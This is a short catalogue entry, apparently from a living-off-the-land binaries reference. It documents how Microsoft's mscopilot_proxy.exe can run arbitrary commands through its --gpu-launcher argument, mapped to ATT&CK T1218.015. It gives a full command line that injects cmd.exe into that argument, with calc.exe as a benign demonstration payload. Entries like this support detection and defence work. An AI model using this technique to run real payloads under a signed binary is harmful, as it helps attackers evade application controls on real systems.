.. /Mscopilot_proxy.exe
Star

Execute (CMD)

Microsoft Copilot proxy launcher

Paths:

Resources:

Acknowledgements:

Execute

  1. mscopilot_proxy.exe will spawn the provided command. Parent mscopilot_proxy.exe process needs to be killed to avoid command being executed an infinite number of times.

    mscopilot_proxy.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher="cmd.exe /c calc.exe && taskkill /f /im mscopilot.exe &&"
    Use case

    Executes a process under a trusted Microsoft signed binary

    Privileges required
    User
    Operating systems
    Windows 11
    ATT&CK® technique
    T1218.015
    Tags
    Execute: CMD